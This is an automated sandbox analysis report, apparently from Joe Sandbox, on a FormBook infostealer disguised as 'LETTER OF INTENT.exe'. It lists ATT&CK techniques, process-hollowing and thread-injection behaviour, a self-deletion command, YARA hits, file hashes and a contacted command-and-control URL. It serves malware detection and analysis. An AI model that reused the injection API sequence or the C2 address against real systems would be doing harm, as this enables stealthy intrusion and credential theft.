            Source: Yara matchFile source: 00000001.00000000.242704154.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts1
            Shared Modules            		Path Interception512
            Process Injection            		1
            Masquerading            		OS Credential Dumping1
            Query Registry            		Remote Services1
            Archive Collected Data            		Exfiltration Over Other Network Medium1
            Encrypted Channel            		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
            Disable or Modify Tools            		LSASS Memory231
            Security Software Discovery            		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
            Application Layer Protocol            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)41
            Virtualization/Sandbox Evasion            		Security Account Manager2
            Process Discovery            		SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)512
            Process Injection            		NTDS41
            Virtualization/Sandbox Evasion            		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets1
            System Network Configuration Discovery            		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common41
            Obfuscated Files or Information            		Cached Domain Credentials1
            File and Directory Discovery            		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items3
            Software Packing            		DCSync112
            System Information Discovery            		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
            File Deletion            		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 574776 Sample: LETTER OF INTENT.exe Startdate: 18/02/2022 Architecture: WINDOWS Score: 100 44 Found malware configuration 2->44 46 Malicious sample detected (through community Yara rule) 2->46 48 Multi AV Scanner detection for submitted file 2->48 50 6 other signatures 2->50 10 LETTER OF INTENT.exe 3 2->10         started        14 explorer.exe 10 2->14         started        process3 file4 32 C:\Users\user\...\LETTER OF INTENT.exe.log, ASCII 10->32 dropped 62 Injects a PE file into a foreign processes 10->62 16 LETTER OF INTENT.exe 10->16         started        signatures5 process6 signatures7 36 Modifies the context of a thread in another process (thread injection) 16->36 38 Maps a DLL or memory area into another process 16->38 40 Sample uses process hollowing technique 16->40 42 Queues an APC in another process (thread injection) 16->42 19 explorer.exe 16->19 injected process8 signatures9 52 Uses ipconfig to lookup or modify the Windows network settings 19->52 22 ipconfig.exe 19->22         started        process10 signatures11 54 Self deletion via cmd delete 22->54 56 Modifies the context of a thread in another process (thread injection) 22->56 58 Maps a DLL or memory area into another process 22->58 60 Tries to detect virtualization through RDTSC time measurements 22->60 25 explorer.exe 2 160 22->25         started        28 cmd.exe 1 22->28         started        process12 dnsIp13 34 192.168.2.1 unknown unknown 25->34 30 conhost.exe 28->30         started        process14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            LETTER OF INTENT.exe26%VirustotalBrowse

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            1.0.LETTER OF INTENT.exe.400000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            1.2.LETTER OF INTENT.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            1.0.LETTER OF INTENT.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            1.0.LETTER OF INTENT.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            www.czzhudi.com/uar3/2%VirustotalBrowse
            www.czzhudi.com/uar3/0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            No contacted domains info

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            www.czzhudi.com/uar3/true
            • 2%, Virustotal, Browse
            • Avira URL Cloud: safe
            		low

            World Map of Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public IPs

            IPDomainCountryFlagASNASN NameMalicious

            Private

            IP
            192.168.2.1

            General Information

            Joe Sandbox Version:34.0.0 Boulder Opal
            Analysis ID:574776
            Start date:18.02.2022
            Start time:16:18:08
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 12m 16s
            Hypervisor based Inspection enabled:false
            Report type:full
            Sample file name:LETTER OF INTENT.exe
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
            Number of analysed new started processes analysed:36
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:1
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal100.troj.evad.winEXE@9/2@0/1
            EGA Information:
            • Successful, ratio: 100%
            HDC Information:
            • Successful, ratio: 64.5% (good quality ratio 57.8%)
            • Quality average: 69.8%
            • Quality standard deviation: 32.8%
            HCA Information:
            • Successful, ratio: 92%
            • Number of executed functions: 117
            • Number of non-executed functions: 135
            Cookbook Comments:
            • Adjust boot time
            • Enable AMSI
            • Found application associated with file extension: .exe

            Warnings

            • Exclude process from analysis (whitelisted): MpCmdRun.exe, SearchUI.exe, BackgroundTransferHost.exe, WerFault.exe, ShellExperienceHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, mobsync.exe, wuapihost.exe
            • Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
            • Not all processes where analyzed, report is missing behavior information
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
            • Report size getting too big, too many NtCreateFile calls found.
            • Report size getting too big, too many NtEnumerateKey calls found.
            • Report size getting too big, too many NtEnumerateValueKey calls found.
            • Report size getting too big, too many NtOpenFile calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryAttributesFile calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.

            Simulations

            Behavior and APIs

            TimeTypeDescription
            16:19:01API Interceptor1x Sleep call for process: LETTER OF INTENT.exe modified
            16:20:11API Interceptor316x Sleep call for process: explorer.exe modified

            Joe Sandbox View / Context

            IPs

            No context

            Domains

            No context

            ASNs

            No context

            JA3 Fingerprints

            No context

            Dropped Files

            No context

            Created / dropped Files

            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\LETTER OF INTENT.exe.log

            Download File
            Process:C:\Users\user\Desktop\LETTER OF INTENT.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):1873
            Entropy (8bit):5.355036985457214
            Encrypted:false
            SSDEEP:48:MxHKXeHKlEHU0YHKhQnouHIW7HKjntHoxHhAHKzvr1qHxvj:iqXeqm00YqhQnouRqjntIxHeqzTwRb
            MD5:3EA795204F0AE6DF0CC6499311A7BD85
            SHA1:95E0DB4B438485204891236BFF9F1FDE6686E995
            SHA-256:361C4FA9B912A516418473EB73389D4CA002A2BAEA39B4492DB37A3FA1A0B2CF
            SHA-512:9C8D1ECCC3F5981EDD1AA6330BA048E94A86501EFE79B2153E17EA053586F4CC4B0D3FC755EE4B1237DC7E8ED91C842DD36D8CFA14263B02FE1E1A67CBE9CEC6
            Malicious:true
            Reputation:moderate, very likely benign file
            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi

            C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db

            Download File
            Process:C:\Windows\explorer.exe
            File Type:data
            Category:modified
            Size (bytes):29232
            Entropy (8bit):1.7250284876731006
            Encrypted:false
            SSDEEP:48:VSAM7sKRXki4j61DijgQ1MMDSYzhzoapfkf3RPnwYV1vHL65LNYtMKfu8q+9KFcI:497Haj6g1jDSbaqlbVUzsBu8nIceKq
            MD5:EA7C836B2E6E62AC35AEE21C3A23DA34
            SHA1:F1204AE84F109D1B4BF13966F9543E5455C1A112
            SHA-256:EFCB951BC2060B075AD876E909CFB852EA6BC0D17F57C7BDCA515D2EF66CD7D2
            SHA-512:58C77E0D6C1D9DCE906F16249796A07D355BE28E86577D2EBC550769307A727D5B990ACEC9CD469F0DE48DE5E5844452905E92ADF7DF7C846F707B43306A14F1
            Malicious:false
            Reputation:low
            Preview:..0 IMMM ...............................................................................z...........8...............................................................................................................................................................................................QR.................................................................z.....Q. ...........(...................................................R..T.g.5 ............n..................................................Pw8.i... ............V..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            Static File Info

            General

            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Entropy (8bit):7.631609505964498
            TrID:
            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            • Win32 Executable (generic) a (10002005/4) 49.75%
            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
            • Windows Screen Saver (13104/52) 0.07%
            • Generic Win/DOS Executable (2004/3) 0.01%
            File name:LETTER OF INTENT.exe
            File size:768512
            MD5:b3f43a58149d9058f8c39455869c2f84
            SHA1:8f3d20b2f71e7331c355e2926a5fc5ce71e72eb8
            SHA256:a04a4acf00f50f8b3c3bea38914813aa75ce4ba8c30c08971a6094c492d0d41d
            SHA512:4aa74fa83551e3c2318f488cf2dbd0741e9b42899ad8501c0bf9d0e2c6471fee6ad0c1588ea652195de1ef813e51bc2bb03628cf5609792e7e59e1baa56b3fef
            SSDEEP:12288:m5VkoeQ0t3NDoFiXtXZY3ipV/SykcDw0sK7kcunGudQtcuMx:1ND7pY3iX/fvD317xu5QtvW
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../..b..............0.............~.... ........@.. ....................... ............@................................

            File Icon

            Icon Hash:00828e8e8686b000

            Static PE Info

            General

            Entrypoint:0x4bc87e
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows gui
            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Time Stamp:0x620F9B2F [Fri Feb 18 13:12:15 2022 UTC]
            TLS Callbacks:
            CLR (.Net) Version:v4.0.30319
            OS Version Major:4
            OS Version Minor:0
            File Version Major:4
            File Version Minor:0
            Subsystem Version Major:4
            Subsystem Version Minor:0
            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

            Entrypoint Preview

            Instruction
            jmp dword ptr [00402000h]
            add byte ptr [eax], al
            add byte ptr [eax], al
            xchg eax, esi
            xor byte ptr [edi], al
            jnbe 00007F5B9CA6FB4Eh
            popad
            push cs
            out dx, al
            mov edx, 19990951h
            les ebp, fword ptr [ebp+07h]

            Data Directories

            NameVirtual AddressVirtual Size Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IMPORT0xbc82c0x4f.text
            IMAGE_DIRECTORY_ENTRY_RESOURCE0xbe0000x630.rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
            IMAGE_DIRECTORY_ENTRY_BASERELOC0xc00000xc.reloc
            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

            Sections

            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
            .text0x20000xbac8c0xbae00False0.864288513796data7.64198906691IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            .rsrc0xbe0000x6300x800False0.33740234375data3.46913951929IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .reloc0xc00000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

            Resources

            NameRVASizeTypeLanguageCountry
            RT_VERSION0xbe0900x3a0data
            RT_MANIFEST0xbe4400x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

            Imports

            DLLImport
            mscoree.dll_CorExeMain

            Version Infos

            DescriptionData
            Translation0x0000 0x04b0
            LegalCopyrightDeltaEngine 2012
            Assembly Version1.0.0.0
            InternalNameConsoleSpecial.exe
            FileVersion1.0.0.0
            CompanyNameDeltaEngine
            LegalTrademarks
            Comments
            ProductNameBlogEngineSpamCommentRemover
            ProductVersion1.0.0.0
            FileDescriptionBlogEngine Spam Comment Remover
            OriginalFilenameConsoleSpecial.exe

            Network Behavior

            No network behavior found

            Statistics

            CPU Usage

            Click to jump to process

            Memory Usage

            Click to jump to process

            High Level Behavior Distribution

            Click to dive into process behavior distribution

            Behavior

            Click to jump to process

            System Behavior

            General

            Target ID:0
            Start time:16:19:00
            Start date:18/02/2022
            Path:C:\Users\user\Desktop\LETTER OF INTENT.exe
            Wow64 process (32bit):true
            Commandline:"C:\Users\user\Desktop\LETTER OF INTENT.exe"
            Imagebase:0xfd0000
            File size:768512 bytes
            MD5 hash:B3F43A58149D9058F8C39455869C2F84
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:.Net C# or VB.NET
            Yara matches:
            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.245569266.000000000340A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.248115726.00000000045B2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.248115726.00000000045B2000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.248115726.00000000045B2000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
            Reputation:low

            General

            Target ID:1
            Start time:16:19:03
            Start date:18/02/2022
            Path:C:\Users\user\Desktop\LETTER OF INTENT.exe
            Wow64 process (32bit):true
            Commandline:C:\Users\user\Desktop\LETTER OF INTENT.exe
            Imagebase:0x670000
            File size:768512 bytes
            MD5 hash:B3F43A58149D9058F8C39455869C2F84
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.307845836.0000000001100000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.307845836.0000000001100000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.307845836.0000000001100000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.307789008.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.307789008.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.307789008.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.242299044.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.242299044.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.242299044.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000000.242704154.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000000.242704154.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000000.242704154.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
            Reputation:low

            General

            Target ID:3
            Start time:16:19:07
            Start date:18/02/2022
            Path:C:\Windows\explorer.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\Explorer.EXE
            Imagebase:0x7ff693d90000
            File size:3933184 bytes
            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.288819841.000000000E458000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.288819841.000000000E458000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.288819841.000000000E458000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.274895699.000000000E458000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.274895699.000000000E458000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.274895699.000000000E458000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
            Reputation:high

            General

            Target ID:15
            Start time:16:19:29
            Start date:18/02/2022
            Path:C:\Windows\SysWOW64\ipconfig.exe
            Wow64 process (32bit):true
            Commandline:C:\Windows\SysWOW64\ipconfig.exe
            Imagebase:0x2c0000
            File size:29184 bytes
            MD5 hash:B0C7423D02A007461C850CD0DFE09318
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.505138541.0000000000350000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.505138541.0000000000350000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.505138541.0000000000350000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.506165216.0000000002700000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.506165216.0000000002700000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.506165216.0000000002700000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
            Reputation:moderate

            General

            Target ID:16
            Start time:16:19:35
            Start date:18/02/2022
            Path:C:\Windows\SysWOW64\cmd.exe
            Wow64 process (32bit):true
            Commandline:/c del "C:\Users\user\Desktop\LETTER OF INTENT.exe"
            Imagebase:0x150000
            File size:232960 bytes
            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Target ID:17
            Start time:16:19:37
            Start date:18/02/2022
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff7ecfc0000
            File size:625664 bytes
            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Target ID:23
            Start time:16:20:10
            Start date:18/02/2022
            Path:C:\Windows\explorer.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
            Imagebase:0x7ff693d90000
            File size:3933184 bytes
            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            General

            Target ID:36
            Start time:16:21:03
            Start date:18/02/2022
            Path:C:\Windows\explorer.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
            Imagebase:0x7ff693d90000
            File size:3933184 bytes
            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            Disassembly

            Reset < >

              Execution Graph

              Execution Coverage:6.8%
              Dynamic/Decrypted Code Coverage:100%
              Signature Coverage:0%
              Total number of Nodes:18
              Total number of Limit Nodes:0
              execution_graph 15116 61c71d8 15117 61c7220 WriteProcessMemory 15116->15117 15119 61c7277 15117->15119 15124 61c72f8 15125 61c7343 ReadProcessMemory 15124->15125 15127 61c7387 15125->15127 15136 61c70e8 15137 61c7128 VirtualAllocEx 15136->15137 15139 61c7165 15137->15139 15120 61c6f50 15121 61c6f95 SetThreadContext 15120->15121 15123 61c6fdd 15121->15123 15128 61c74f0 15129 61c7579 CreateProcessA 15128->15129 15131 61c773b 15129->15131 15132 61c6e70 15133 61c6eb0 ResumeThread 15132->15133 15135 61c6ee1 15133->15135

              Executed Functions

              Function 01926810 Relevance: .1, Instructions: 138COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 442 1926810-1926832 443 1926834 442->443 444 1926839-19268b6 call 192514c 442->444 443->444 448 192692a-192693d 444->448 449 1926943-1926959 448->449 450 19268b8-19268bf 448->450 456 1926963-1926997 449->456 451 1926911-1926924 450->451 452 19268c1-19268eb call 192515c 451->452 453 1926926-1926927 451->453 461 19268f3-192690e 452->461 453->448 461->451
              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b085c9a8300b02f3ff0f2c1aa2037bcdf680574ba4d98a0864defd99ec9603c3
              • Instruction ID: feca33cc89858d024984335e66de9b71b92307a5f6e611d1871a51facb781c98
              • Opcode Fuzzy Hash: b085c9a8300b02f3ff0f2c1aa2037bcdf680574ba4d98a0864defd99ec9603c3
              • Instruction Fuzzy Hash: CB519375D052299FDF04CFEAC844AEEFBB2BF89300F148429D919AB258DB745946CF40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 01926D58 Relevance: .1, Instructions: 137COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 463 1926d58-1926d7d 464 1926d84-1926ddd 463->464 465 1926d7f 463->465 468 1926de4-1926e18 464->468 469 1926ddf 464->469 465->464 471 1926ea1-1926eba 468->471 469->468 472 1926ec0-1926ec7 471->472 473 1926e1d-1926e27 471->473 478 1926ecf-1926ee2 472->478 474 1926e29 473->474 475 1926e2e-1926e3f 473->475 474->475 476 1926e41 475->476 477 1926e46-1926e59 475->477 476->477 479 1926e60-1926e90 477->479 480 1926e5b 477->480 483 1926e92-1926e98 479->483 484 1926e9a 479->484 480->479 485 1926e9d-1926e9e 483->485 484->485 485->471
              Memory Dump Source
              • Source File: 00000000.00000002.245448320.0000000001920000.00000040.00000800.00020000.00000000.sdmp, Offset: 01920000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1920000_LETTER OF INTENT.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1f57d8645a6146e2b8e79e2ce29a4c8e5198ebcb632ee65898e500e72530f314
              • Instruction ID: e90c473baf27e38c011935482925ea2e0efb86633d45325cf890f286d72d1f43
              • Opcode Fuzzy Hash: 1f57d8645a6146e2b8e79e2ce29a4c8e5198ebcb632ee65898e500e72530f314
              • Instruction Fuzzy Hash: FA51C474E012299FCB04DFAAD9849EEFBF2BF88310F18C565E409A7255D730A941CB90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 01926801 Relevance: .1, Instructions: 99COMMON
              Download Yara Rule
              Memory Dump Source
